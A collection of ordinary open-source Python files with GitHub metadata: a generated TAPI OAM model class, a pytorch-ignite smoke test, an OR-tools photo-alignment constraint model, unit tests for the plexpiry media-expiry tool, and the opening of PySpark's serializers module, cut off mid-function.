:param oam_constraint: The oam_constraint of this TapiOamCreateoamserviceInput. # noqa: E501
:type oam_constraint: TapiOamOamConstraint
:param state: The state of this TapiOamCreateoamserviceInput. # noqa: E501
:type state: str
:param end_point: The end_point of this TapiOamCreateoamserviceInput. # noqa: E501
:type end_point: List[TapiOamOamServiceEndPoint]
"""
self.openapi_types = {
'oam_constraint': TapiOamOamConstraint,
'state': str,
'end_point': List[TapiOamOamServiceEndPoint]
}
self.attribute_map = {
'oam_constraint': 'oam-constraint',
'state': 'state',
'end_point': 'end-point'
}
self._oam_constraint = oam_constraint
self._state = state
self._end_point = end_point
@classmethod
def from_dict(cls, dikt) -> 'TapiOamCreateoamserviceInput':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The tapi.oam.createoamservice.Input of this TapiOamCreateoamserviceInput. # noqa: E501
:rtype: TapiOamCreateoamserviceInput
"""
return util.deserialize_model(dikt, cls)
@property
def oam_constraint(self):
"""Gets the oam_constraint of this TapiOamCreateoamserviceInput.
:return: The oam_constraint of this TapiOamCreateoamserviceInput.
:rtype: TapiOamOamConstraint
"""
return self._oam_constraint
@oam_constraint.setter
def oam_constraint(self, oam_constraint):
"""Sets the oam_constraint of this TapiOamCreateoamserviceInput.
:param oam_constraint: The oam_constraint of this TapiOamCreateoamserviceInput.
:type oam_constraint: TapiOamOamConstraint
"""
self._oam_constraint = oam_constraint
@property
def state(self):
"""Gets the state of this TapiOamCreateoamserviceInput.
none # noqa: E501
:return: The state of this TapiOamCreateoamserviceInput.
:rtype: str
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this TapiOamCreateoamserviceInput.
none # noqa: E501
:param state: The state of this TapiOamCreateoamserviceInput.
:type state: str
"""
self._state = state
@property
def end_point(self):
"""Gets the end_point of this TapiOamCreateoamserviceInput.
none # noqa: E501
:return: The end_point of this TapiOamCreateoamserviceInput.
:rtype: List[TapiOamOamServiceEndPoint]
"""
return self._end_point
@end_point.setter
def end_point(self, end_point):
"""Sets the end_point of this TapiOamCreateoamserviceInput.
none # noqa: E501
:param end_point: The end_point of this TapiOamCreateoamserviceInput.
:type end_point: List[TapiOamOamServiceEndPoint]
"""
self._end_point = end_point
| {
"content_hash": "71b0f3ae7e7782d5e0cedd5454f101ef",
"timestamp": "",
"source": "github",
"line_count": 120,
"max_line_length": 106,
"avg_line_length": 31.675,
"alnum_prop": 0.6521967903183373,
"repo_name": "OpenNetworkingFoundation/ONFOpenTransport",
"id": "33019201dec4ad59ba3b621c3f13534e986f08bc",
"size": "3818",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "RI/flask_server/tapi_server/models/tapi_oam_createoamservice_input.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "D",
"bytes": "2562"
}
],
"symlink_target": ""
} |
import unittest
from ignite.engine import Engine
class TestPytorchIgnite(unittest.TestCase):
def test_engine(self):
def update_fn(engine, batch):
pass
engine = Engine(update_fn)
engine.run([0, 1, 2])
| {
"content_hash": "17b3b3d5b6d22aac5d36065255849c88",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 43,
"avg_line_length": 18.846153846153847,
"alnum_prop": 0.6326530612244898,
"repo_name": "Kaggle/docker-python",
"id": "aef07ff6d381098ec347e8c8f7719df956bf8e04",
"size": "245",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_pytorch_ignite.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "9530"
},
{
"name": "Jupyter Notebook",
"bytes": "1778"
},
{
"name": "Python",
"bytes": "159874"
},
{
"name": "Shell",
"bytes": "16313"
},
{
"name": "Smarty",
"bytes": "458"
}
],
"symlink_target": ""
} |
"""
Photo problem in Google CP Solver.
Problem statement from Mozart/Oz tutorial:
http://www.mozart-oz.org/home/doc/fdt/node37.html#section.reified.photo
'''
Betty, Chris, Donald, Fred, Gary, Mary, and Paul want to align in one
row for taking a photo. Some of them have preferences next to whom
they want to stand:
1. Betty wants to stand next to Gary and Mary.
2. Chris wants to stand next to Betty and Gary.
3. Fred wants to stand next to Mary and Donald.
4. Paul wants to stand next to Fred and Donald.
Obviously, it is impossible to satisfy all preferences. Can you find
an alignment that maximizes the number of satisfied preferences?
'''
Oz solution:
6 # alignment(betty:5 chris:6 donald:1 fred:3 gary:7 mary:4 paul:2)
[5, 6, 1, 3, 7, 4, 2]
Compare with the following models:
* MiniZinc: http://www.hakank.org/minizinc/photo_hkj.mzn
* Comet: http://hakank.org/comet/photo_problem.co
* SICStus: http://hakank.org/sicstus/photo_problem.pl
This model was created by Hakan Kjellerstrand ([email protected])
Also see my other Google CP Solver models:
http://www.hakank.org/google_or_tools/
"""
import sys
from ortools.constraint_solver import pywrapcp
def main(show_all_max=0):
# Create the solver.
solver = pywrapcp.Solver("Photo problem")
#
# data
#
persons = ["Betty", "Chris", "Donald", "Fred", "Gary", "Mary", "Paul"]
n = len(persons)
preferences = [
# 0 1 2 3 4 5 6
# B C D F G M P
[0, 0, 0, 0, 1, 1, 0], # Betty 0
[1, 0, 0, 0, 1, 0, 0], # Chris 1
[0, 0, 0, 0, 0, 0, 0], # Donald 2
[0, 0, 1, 0, 0, 1, 0], # Fred 3
[0, 0, 0, 0, 0, 0, 0], # Gary 4
[0, 0, 0, 0, 0, 0, 0], # Mary 5
[0, 0, 1, 1, 0, 0, 0] # Paul 6
]
print("""Preferences:
1. Betty wants to stand next to Gary and Mary.
2. Chris wants to stand next to Betty and Gary.
3. Fred wants to stand next to Mary and Donald.
4. Paul wants to stand next to Fred and Donald.
""")
#
# declare variables
#
positions = [solver.IntVar(0, n - 1, "positions[%i]" % i) for i in range(n)]
# successful preferences
z = solver.IntVar(0, n * n, "z")
#
# constraints
#
solver.Add(solver.AllDifferent(positions))
# calculate all the successful preferences
b = [
solver.IsEqualCstVar(abs(positions[i] - positions[j]), 1)
for i in range(n)
for j in range(n)
if preferences[i][j] == 1
]
solver.Add(z == solver.Sum(b))
#
# Symmetry breaking (from the Oz page):
# Fred is somewhere left of Betty
solver.Add(positions[3] < positions[0])
# objective
objective = solver.Maximize(z, 1)
if show_all_max != 0:
print("Showing all maximum solutions (z == 6).\n")
solver.Add(z == 6)
#
# search and result
#
db = solver.Phase(positions, solver.CHOOSE_FIRST_UNBOUND,
solver.ASSIGN_MAX_VALUE)
if show_all_max == 0:
solver.NewSearch(db, [objective])
else:
solver.NewSearch(db)
num_solutions = 0
while solver.NextSolution():
print("z:", z.Value())
p = [positions[i].Value() for i in range(n)]
print(" ".join(
[persons[j] for i in range(n) for j in range(n) if p[j] == i]))
print("Successful preferences:")
for i in range(n):
for j in range(n):
if preferences[i][j] == 1 and abs(p[i] - p[j]) == 1:
print("\t", persons[i], persons[j])
print()
num_solutions += 1
solver.EndSearch()
print()
print("num_solutions:", num_solutions)
print("failures:", solver.Failures())
print("branches:", solver.Branches())
print("WallTime:", solver.WallTime())
show_all_max = 0 # show all maximal solutions
if __name__ == "__main__":
if len(sys.argv) > 1:
show_all_max = 1
main(show_all_max)
| {
"content_hash": "5989fc9be8c06e8631240c8f3fa539ad",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 79,
"avg_line_length": 27.00709219858156,
"alnum_prop": 0.6100315126050421,
"repo_name": "google/or-tools",
"id": "6a513d848019f534cd506a8596f4e612a1c3cfce",
"size": "4408",
"binary": false,
"copies": "2",
"ref": "refs/heads/stable",
"path": "examples/contrib/photo_problem.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "18599"
},
{
"name": "C",
"bytes": "11382"
},
{
"name": "C#",
"bytes": "498888"
},
{
"name": "C++",
"bytes": "14071164"
},
{
"name": "CMake",
"bytes": "219723"
},
{
"name": "Dockerfile",
"bytes": "149476"
},
{
"name": "Java",
"bytes": "459136"
},
{
"name": "Lex",
"bytes": "2271"
},
{
"name": "Makefile",
"bytes": "207007"
},
{
"name": "Python",
"bytes": "629275"
},
{
"name": "SWIG",
"bytes": "414259"
},
{
"name": "Shell",
"bytes": "83555"
},
{
"name": "Starlark",
"bytes": "235950"
},
{
"name": "Yacc",
"bytes": "26027"
},
{
"name": "sed",
"bytes": "45"
}
],
"symlink_target": ""
} |
import ConfigParser
import fixtures
import os
import testtools
import urlparse
from plexpiry import plexpiry
FAKE_DICT = {'a': 1,
'b': 2,
'c': 3,
'd': 4,
}
# FIXME: Check this against a real response
FAKE_SECTIONS = {'show': {'key': '2', 'title': 'TV Shows'},
'movie': {'key': '1', 'title': 'Movies'},
}
FAKE_TV_TREE = {'425':
{'seasons':
{'426':
{'episodes':
{'433':
{'addedAt': '1401322741',
'lastViewedAt': '1401322997',
'originallyAvailableAt': '2007-05-21',
'ratingKey': '433',
'title': 'Episode 7',
'viewCount': '1'}},
'title': 'Season 1'},
'434':
{'episodes':
{'433':
{'addedAt': '1401322741',
'lastViewedAt': '1401322997',
'originallyAvailableAt': '2007-05-21',
'ratingKey': '433',
'title': 'Episode 7',
'viewCount': '1'}},
'title': 'Season 2'}},
'title': 'Spaced'}}
FAKE_TV_SHOWS = {'425': {'title': 'Spaced'}}
FAKE_TV_SEASONS = {'426': {'title': 'Season 1'}, '434': {'title': 'Season 2'}}
FAKE_TV_EPISODES = {'433': {'addedAt': '1401322741',
'lastViewedAt': '1401322997',
'originallyAvailableAt': '2007-05-21',
'ratingKey': '433',
'title': 'Episode 7',
'viewCount': '1'}}
FAKE_TV_EPISODE = {'addedAt': '1401322741',
'art': '/library/metadata/425/art/1401322765',
'contentRating': 'Caution',
'duration': '1491000',
'grandparentKey': '/library/metadata/425',
'grandparentRatingKey': '425',
'grandparentTheme':
'/library/metadata/425/theme/1401322765',
'grandparentThumb':
'/library/metadata/425/thumb/1401322765',
'grandparentTitle': 'Spaced',
'guid': 'com.plexapp.agents.thetvdb://72658/1/7?lang=en',
'index': '7',
'key': '/library/metadata/433',
'lastViewedAt': '1401322997',
'originallyAvailableAt': '2007-05-21',
'parentIndex': '1',
'parentKey': '/library/metadata/426',
'parentRatingKey': '426',
'parentThumb': '/library/metadata/426/thumb/1401322765',
'rating': '8.3',
'ratingKey': '433',
'summary': "Daisy and Tim's domestic bliss is threatened "
"when Tim's ex-girlfriend reappears and wants "
"to get back together with him. Adult themes "
"and strong language",
'thumb': '/library/metadata/433/thumb/1401322765',
'title': 'Episode 7',
'type': 'episode',
'updatedAt': '1401322765',
'viewCount': '1',
'year': '2007'}
FAKE_MOVIES = {'1024': {'addedAt': '1418348404',
'lastViewedAt': '1418653256',
'originallyAvailableAt': '2013-09-02',
'ratingKey': '1024',
'title': 'The Zero Theorem',
'viewCount': '1'},
'1135': {'addedAt': '1421060244',
'lastViewedAt': '1421675051',
'originallyAvailableAt': '2014-08-16',
'ratingKey': '1135',
'title': 'Zodiac: Signs of the Apocalypse',
'viewCount': '1'}}
FAKE_MOVIE_ONE = {'addedAt': '1418348404',
'art': '/library/metadata/1024/art/1418349807',
'chapterSource': 'media',
'contentRating': '15+',
'duration': '6387304',
'guid': 'com.plexapp.agents.imdb://tt2333804?lang=en',
'key': '/library/metadata/1024',
'lastViewedAt': '1418653256',
'originallyAvailableAt': '2013-09-02',
'rating': '5.9',
'ratingKey': '1024',
'studio': 'Picture Perfect Corporation',
'summary': "A computer hacker's goal to discover the reason "
"for human existence continually finds his work "
"interrupted thanks to the Management; this time"
", they send a teenager and lusty love interest "
"to distract him.",
'tagline': 'Nothing is Everything',
'thumb': '/library/metadata/1024/thumb/1418349807',
'title': 'The Zero Theorem',
'titleSort': 'Zero Theorem',
'type': 'movie',
'updatedAt': '1418349807',
'viewCount': '1',
'year': '2013'}
FAKE_PATH = os.path.dirname(__file__)
FAKE_SECTIONS_XML = os.path.join(FAKE_PATH, "fake_sections.xml")
FAKE_SECTION_2_XML = os.path.join(FAKE_PATH, "fake_section_2.xml")
FAKE_TV_TREE_XML = os.path.join(FAKE_PATH, "fake_tv_tree.xml")
FAKE_TV_SHOWS_XML = os.path.join(FAKE_PATH, "fake_tv_shows.xml")
FAKE_TV_SEASONS_XML = os.path.join(FAKE_PATH, "fake_tv_seasons.xml")
FAKE_TV_EPISODES_XML = os.path.join(FAKE_PATH, "fake_tv_episodes.xml")
FAKE_TV_EPISODE_XML = os.path.join(FAKE_PATH, "fake_tv_episode.xml")
FAKE_TV_EPISODE_METADATA_XML = os.path.join(FAKE_PATH,
"fake_tv_episode_metadata.xml")
FAKE_TV_EPISODE_2448_XML = os.path.join(FAKE_PATH, "2448.xml")
FAKE_TV_EPISODE_2254_XML = os.path.join(FAKE_PATH, "2254.xml")
FAKE_TV_EPISODE_2257_XML = os.path.join(FAKE_PATH, "2257.xml")
FAKE_TV_EPISODE_433_XML = os.path.join(FAKE_PATH, "433.xml")
FAKE_MOVIES_XML = os.path.join(FAKE_PATH, "fake_movies.xml")
FAKE_MOVIE_ONE_XML = os.path.join(FAKE_PATH, "fake_movie_one.xml")
FAKE_MOVIE_TWO_XML = os.path.join(FAKE_PATH, "fake_movie_two.xml")
GOOD_CONFIG_FILE = os.path.join(FAKE_PATH, "good_config_file.conf")
BAD_CONFIG_FILE = os.path.join(FAKE_PATH, "bad_config_file.conf")
BAD_CONFIG_FILE2 = os.path.join(FAKE_PATH, "bad_config_file2.conf")
EMPTY_CONFIG_FILE = os.path.join(FAKE_PATH, "empty_file")
NON_EXPIRING_CONFIG_FILE = os.path.join(FAKE_PATH,
"non_expiring_config_file.conf")
IGNORE_CONFIG_FILE = os.path.join(FAKE_PATH, "ignore.conf")
NEVER_EXPIRE_CONFIG_FILE = os.path.join(FAKE_PATH, "never_expire.conf")
FAKE_EMPTY = os.path.join(FAKE_PATH, "empty_file")
TEST_TV_SHOW = 425
TEST_TV_SEASON = 426
TEST_TV_EPISODE = 433
TEST_MOVIE = 1024
FAKE_OPTIONS = ["-s", "fakeserver", "-p", "1234", "-c", GOOD_CONFIG_FILE]
FAKE_BADCONFIGFILE_OPTIONS = ["-s", "fakeserver", "-p", "1234",
"-c", BAD_CONFIG_FILE]
class TestPlexpiry(testtools.TestCase):
def setUp(self):
super(TestPlexpiry, self).setUp()
def fake_urlopen(url):
url = urlparse.urlparse(url)
if url.path == "/library/sections":
return open(FAKE_SECTIONS_XML)
if url.path == "/library/sections/1/all":
return open(FAKE_MOVIES_XML)
if url.path == "/library/sections/2/all":
return open(FAKE_TV_SHOWS_XML)
if url.path == "/library/metadata/1024":
return open(FAKE_MOVIE_ONE_XML)
if url.path == "/library/metadata/1135":
return open(FAKE_MOVIE_TWO_XML)
if url.path == "/library/metadata/425/children":
return open(FAKE_TV_SEASONS_XML)
if url.path == "/library/metadata/426/children":
return open(FAKE_TV_EPISODES_XML)
if url.path == "/library/metadata/433/children":
return open(FAKE_TV_EPISODE_XML)
if url.path == "/library/metadata/2251":
return open(FAKE_TV_EPISODE_METADATA_XML)
if url.path == "/library/metadata/2448":
return open(FAKE_TV_EPISODE_2448_XML)
if url.path == "/library/metadata/2254":
return open(FAKE_TV_EPISODE_2254_XML)
if url.path == "/library/metadata/2257":
return open(FAKE_TV_EPISODE_2257_XML)
if url.path == "/library/metadata/433":
return open(FAKE_TV_EPISODE_433_XML)
if url.path == "/library/metadata/2":
return open(FAKE_SECTION_2_XML)
if url.path == "/library/sections/1/refresh":
return open(FAKE_EMPTY)
if url.path == "/library/sections/2/refresh":
return open(FAKE_EMPTY)
if url.path == "/library/metadata/434/children":
return open(FAKE_TV_TREE_XML)
raise ValueError("Unknown request: %s" % url.path)
self.useFixture(fixtures.NestedTempfile())
self.stdout = self.useFixture(fixtures.StringStream('stdout')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stdout', self.stdout))
stderr = self.useFixture(fixtures.StringStream('stderr')).stream
self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
self.logger = self.useFixture(fixtures.FakeLogger(name="plexpiry"))
self.useFixture(fixtures.MonkeyPatch('urllib2.urlopen', fake_urlopen))
self.addCleanup(self.cleanUp)
self.options = plexpiry.parse_options(FAKE_OPTIONS)
self.plexpiry = plexpiry.Plexpiry(self.options)
self.plexpiry.find_sections()
def cleanUp(self):
self.options = plexpiry.parse_options(FAKE_OPTIONS)
def test_urlbase(self):
self.assertEqual("http://fakeserver:1234", self.plexpiry.urlbase)
def test_dbg_silence(self):
self.plexpiry.dbg("test_dbg_silence")
self.stdout.seek(0)
self.assertEqual('', self.stdout.read().strip())
def test_dbg_noise(self):
self.options.debug = True
self.plexpiry.dbg("test_dbg_noise")
self.stdout.seek(0)
self.assertEqual("DEBUG: test_dbg_noise", self.stdout.read().strip())
def test_err(self):
self.plexpiry.err("test_err")
self.stdout.seek(0)
self.assertEqual("ERROR: test_err", self.stdout.read().strip())
def test_info(self):
self.plexpiry.info("test_info")
self.stdout.seek(0)
self.assertEqual("INFO: test_info", self.stdout.read().strip())
def test_trim_dict(self):
expected_dict = \
{
'a': 1,
'd': 4,
}
new_dict = self.plexpiry.trim_dict(FAKE_DICT, ['a', 'd'])
self.assertEqual(expected_dict, new_dict)
def test_open_config_file(self):
data = self.plexpiry.open_config_file().read()
self.assertEqual(open(GOOD_CONFIG_FILE).read(), data)
def test_good_config_file(self):
self.plexpiry = plexpiry.Plexpiry(self.options)
self.plexpiry.load_config()
def test_bad_config_file(self):
self.plexpiry = plexpiry.Plexpiry(self.options)
self.options.config_file = BAD_CONFIG_FILE
self.assertRaises(ConfigParser.ParsingError, self.plexpiry.load_config)
self.options.config_file = BAD_CONFIG_FILE2
self.assertRaises(ConfigParser.MissingSectionHeaderError,
self.plexpiry.load_config)
self.assertRaises(ConfigParser.ParsingError,
plexpiry.Plexpiry,
plexpiry.parse_options(FAKE_BADCONFIGFILE_OPTIONS))
def test_empty_config_file(self):
self.plexpiry = plexpiry.Plexpiry(self.options)
self.options.config_file = EMPTY_CONFIG_FILE
self.plexpiry.load_config()
def test_get_config_sections(self):
self.assertEqual(['global', 'movies', 'tv'],
self.plexpiry.get_config_sections())
def test_get_config_section(self):
self.assertEqual({'watched': '30d',
'unwatched': '90d'},
self.plexpiry.get_config_section("global"))
def test_get_config_no_section(self):
self.assertEqual(None, self.plexpiry.get_config_section("bogus"))
def test_collapse_config(self):
self.assertEqual({'__name': 'Spaced',
'unwatched': '90d',
'watched': '30d',
'aired': '365d'},
self.plexpiry.collapse_config("Spaced", "tv"))
def test_parse_time_bare(self):
self.assertEqual(1, self.plexpiry.parse_time('1'))
def test_parse_time_days(self):
self.assertEqual(86400, self.plexpiry.parse_time('1d'))
def test_parse_time_weeks(self):
self.assertEqual(86400 * 7, self.plexpiry.parse_time('1w'))
def test_parse_time_years(self):
self.assertEqual(86400 * 365, self.plexpiry.parse_time('1y'))
def test_parse_time_bogus(self):
self.assertRaises(ValueError, self.plexpiry.parse_time, 'bogus')
def test_parse_time_negative(self):
self.assertRaises(ValueError, self.plexpiry.parse_time, '-1')
def test_find_sections(self):
self.assertEqual(FAKE_SECTIONS, self.plexpiry.sections)
def test_get_tv_tree(self):
self.assertEquals(FAKE_TV_TREE, self.plexpiry.get_tv_tree())
def test_find_tv_shows(self):
shows = self.plexpiry.find_tv_shows()
self.assertEqual(FAKE_TV_SHOWS, shows)
def test_find_tv_seasons(self):
seasons = self.plexpiry.find_tv_seasons(TEST_TV_SHOW)
self.assertEqual(FAKE_TV_SEASONS, seasons)
def test_find_tv_episodes(self):
episodes = self.plexpiry.find_tv_episodes(TEST_TV_SHOW, TEST_TV_SEASON)
self.assertEqual(FAKE_TV_EPISODES, episodes)
def test_get_tv_episode(self):
episode = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.assertEqual(FAKE_TV_EPISODE, episode)
def test_get_movies(self):
movies = self.plexpiry.get_movie_tree()
self.assertEqual(FAKE_MOVIES, movies)
def test_get_movie(self):
movie = self.plexpiry.get_movie(TEST_MOVIE)
self.assertEqual(FAKE_MOVIE_ONE, movie)
def test_is_watched(self):
movie = self.plexpiry.get_movie(TEST_MOVIE)
self.assertEqual(True, self.plexpiry.is_watched(movie))
def test_refresh_plex(self):
self.plexpiry.refresh_plex()
self.options.dryrun = True
self.plexpiry.refresh_plex()
def test_should_expire_media_watched(self):
movie = self.plexpiry.get_movie(TEST_MOVIE)
config = self.plexpiry.collapse_config(movie["title"], "movies")
self.assertEqual(['watched'],
self.plexpiry.should_expire_media(movie, config))
def test_should_expire_media_watched_aired(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.config_file = GOOD_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(['watched', 'aired'],
self.plexpiry.should_expire_media(show,
config))
def test_should_expire_media_noconfig(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.config_file = EMPTY_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(False, self.plexpiry.should_expire_media(show,
config))
def test_should_expire_media_notexpired(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.config_file = NEVER_EXPIRE_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(False, self.plexpiry.should_expire_media(show,
config))
def test_should_expire_media_notwatched_aired(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
del(show["lastViewedAt"])
self.options.config_file = NON_EXPIRING_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(['unwatched'],
self.plexpiry.should_expire_media(show, config))
def test_should_expire_media_ignored(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.config_file = IGNORE_CONFIG_FILE
self.plexpiry.load_config()
config = self.plexpiry.collapse_config("Spaced", "tv")
self.assertEqual(False, self.plexpiry.should_expire_media(show,
config))
def test_delete(self):
show = self.plexpiry.get_tv_episode(TEST_TV_EPISODE)
self.options.dryrun = True
self.options.debug = True
self.plexpiry.delete(show["ratingKey"])
self.stdout.seek(0)
data = self.stdout.read().strip()
self.assertIn("DELETE http://fakeserver:1234/library/metadata/433",
data)
def test_parse_options(self):
args = ['-d', '-n', '-s', 'foo', '-p', '123', '-c', 'bar']
options = {"debug": True,
"dryrun": True,
"server": "foo",
"port": 123,
"config_file": "bar"}
self.assertEqual(options, vars(plexpiry.parse_options(args)))
def test_parse_options_partial(self):
args = ['-s', 'foo']
options = {"debug": False,
"dryrun": False,
"server": "foo",
"port": 32400,
"config_file": "~/.config/plexpiry.conf"}
self.assertEqual(options, vars(plexpiry.parse_options(args)))
def test_expire(self):
self.options.dryrun = True
self.plexpiry.expire()
def test_expire_ignore_all(self):
self.options.dryrun = True
self.options.config_file = IGNORE_CONFIG_FILE
self.plexpiry.load_config()
self.plexpiry.expire()
| {
"content_hash": "d77a121db661c3b44a95aa6ba2fa067d",
"timestamp": "",
"source": "github",
"line_count": 439,
"max_line_length": 79,
"avg_line_length": 42.66970387243736,
"alnum_prop": 0.549167200512492,
"repo_name": "cmsj/plexpiry",
"id": "6ccd27a63a2295e9272c7dd9a5dad3321421e95f",
"size": "18732",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_plexpiry.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "32201"
}
],
"symlink_target": ""
} |
"""
PySpark supports custom serializers for transferring data; this can improve
performance.
By default, PySpark uses L{PickleSerializer} to serialize objects using Python's
C{cPickle} serializer, which can serialize nearly any Python object.
Other serializers, like L{MarshalSerializer}, support fewer datatypes but can be
faster.
The serializer is chosen when creating L{SparkContext}:
>>> from pyspark.context import SparkContext
>>> from pyspark.serializers import MarshalSerializer
>>> sc = SparkContext('local', 'test', serializer=MarshalSerializer())
>>> sc.parallelize(list(range(1000))).map(lambda x: 2 * x).take(10)
[0, 2, 4, 6, 8, 10, 12, 14, 16, 18]
>>> sc.stop()
PySpark serialize objects in batches; By default, the batch size is chosen based
on the size of objects, also configurable by SparkContext's C{batchSize} parameter:
>>> sc = SparkContext('local', 'test', batchSize=2)
>>> rdd = sc.parallelize(range(16), 4).map(lambda x: x)
Behind the scenes, this creates a JavaRDD with four partitions, each of
which contains two batches of two objects:
>>> rdd.glom().collect()
[[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11], [12, 13, 14, 15]]
>>> int(rdd._jrdd.count())
8
>>> sc.stop()
"""
import sys
from itertools import chain, product
import marshal
import struct
import types
import collections
import zlib
import itertools
if sys.version < '3':
import cPickle as pickle
protocol = 2
from itertools import izip as zip, imap as map
else:
import pickle
protocol = 3
xrange = range
from pyspark import cloudpickle
__all__ = ["PickleSerializer", "MarshalSerializer", "UTF8Deserializer"]
class SpecialLengths(object):
END_OF_DATA_SECTION = -1
PYTHON_EXCEPTION_THROWN = -2
TIMING_DATA = -3
END_OF_STREAM = -4
NULL = -5
START_ARROW_STREAM = -6
class Serializer(object):
def dump_stream(self, iterator, stream):
"""
Serialize an iterator of objects to the output stream.
"""
raise NotImplementedError
def load_stream(self, stream):
"""
Return an iterator of deserialized objects from the input stream.
"""
raise NotImplementedError
def _load_stream_without_unbatching(self, stream):
"""
Return an iterator of deserialized batches (iterable) of objects from the input stream.
if the serializer does not operate on batches the default implementation returns an
iterator of single element lists.
"""
return map(lambda x: [x], self.load_stream(stream))
# Note: our notion of "equality" is that output generated by
# equal serializers can be deserialized using the same serializer.
# This default implementation handles the simple cases;
# subclasses should override __eq__ as appropriate.
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
def __hash__(self):
return hash(str(self))
class FramedSerializer(Serializer):
"""
Serializer that writes objects as a stream of (length, data) pairs,
where C{length} is a 32-bit integer and data is C{length} bytes.
"""
def __init__(self):
# On Python 2.6, we can't write bytearrays to streams, so we need to convert them
# to strings first. Check if the version number is that old.
self._only_write_strings = sys.version_info[0:2] <= (2, 6)
def dump_stream(self, iterator, stream):
for obj in iterator:
self._write_with_length(obj, stream)
def load_stream(self, stream):
while True:
try:
yield self._read_with_length(stream)
except EOFError:
return
def _write_with_length(self, obj, stream):
serialized = self.dumps(obj)
if serialized is None:
raise ValueError("serialized value should not be None")
if len(serialized) > (1 << 31):
raise ValueError("can not serialize object larger than 2G")
write_int(len(serialized), stream)
if self._only_write_strings:
stream.write(str(serialized))
else:
stream.write(serialized)
def _read_with_length(self, stream):
length = read_int(stream)
if length == SpecialLengths.END_OF_DATA_SECTION:
raise EOFError
elif length == SpecialLengths.NULL:
return None
obj = stream.read(length)
if len(obj) < length:
raise EOFError
return self.loads(obj)
def dumps(self, obj):
"""
Serialize an object into a byte array.
When batching is used, this will be called with an array of objects.
"""
raise NotImplementedError
def loads(self, obj):
"""
Deserialize an object from a byte array.
"""
raise NotImplementedError
class ArrowSerializer(FramedSerializer):
"""
Serializes bytes as Arrow data with the Arrow file format.
"""
def dumps(self, batch):
import pyarrow as pa
import io
sink = io.BytesIO()
writer = pa.RecordBatchFileWriter(sink, batch.schema)
writer.write_batch(batch)
writer.close()
return sink.getvalue()
def loads(self, obj):
import pyarrow as pa
reader = pa.RecordBatchFileReader(pa.BufferReader(obj))
return reader.read_all()
def __repr__(self):
return "ArrowSerializer"
def _create_batch(series, timezone):
"""
Create an Arrow record batch from the given pandas.Series or list of Series, with optional type.
:param series: A single pandas.Series, list of Series, or list of (series, arrow_type)
:param timezone: A timezone to respect when handling timestamp values
:return: Arrow RecordBatch
"""
from pyspark.sql.types import _check_series_convert_timestamps_internal
import pyarrow as pa
# Make input conform to [(series1, type1), (series2, type2), ...]
if not isinstance(series, (list, tuple)) or \
(len(series) == 2 and isinstance(series[1], pa.DataType)):
series = [series]
series = ((s, None) if not isinstance(s, (list, tuple)) else s for s in series)
# If a nullable integer series has been promoted to floating point with NaNs, need to cast
# NOTE: this is not necessary with Arrow >= 0.7
def cast_series(s, t):
if type(t) == pa.TimestampType:
# NOTE: convert to 'us' with astype here, unit ignored in `from_pandas` see ARROW-1680
return _check_series_convert_timestamps_internal(s.fillna(0), timezone)\
.values.astype('datetime64[us]', copy=False)
# NOTE: can not compare None with pyarrow.DataType(), fixed with Arrow >= 0.7.1
elif t is not None and t == pa.date32():
# TODO: this converts the series to Python objects, possibly avoid with Arrow >= 0.8
return s.dt.date
elif t is None or s.dtype == t.to_pandas_dtype():
return s
else:
return s.fillna(0).astype(t.to_pandas_dtype(), copy=False)
# Some object types don't support masks in Arrow, see ARROW-1721
def create_array(s, t):
casted = cast_series(s, t)
mask = None if casted.dtype == 'object' else s.isnull()
return pa.Array.from_pandas(casted, mask=mask, type=t)
arrs = [create_array(s, t) for s, t in series]
return pa.RecordBatch.from_arrays(arrs, ["_%d" % i for i in xrange(len(arrs))])
class ArrowStreamPandasSerializer(Serializer):
"""
Serializes Pandas.Series as Arrow data with Arrow streaming format.
"""
def __init__(self, timezone):
super(ArrowStreamPandasSerializer, self).__init__()
self._timezone = timezone
def dump_stream(self, iterator, stream):
"""
Make ArrowRecordBatches from Pandas Series and serialize. Input is a single series or
a list of series accompanied by an optional pyarrow type to coerce the data to.
"""
import pyarrow as pa
writer = None
try:
for series in iterator:
batch = _create_batch(series, self._timezone)
if writer is None:
write_int(SpecialLengths.START_ARROW_STREAM, stream)
writer = pa.RecordBatchStreamWriter(stream, batch.schema)
writer.write_batch(batch)
finally:
if writer is not None:
writer.close()
def load_stream(self, stream):
"""
Deserialize ArrowRecordBatches to an Arrow table and return as a list of pandas.Series.
"""
from pyspark.sql.types import _check_dataframe_localize_timestamps
import pyarrow as pa
reader = pa.open_stream(stream)
for batch in reader:
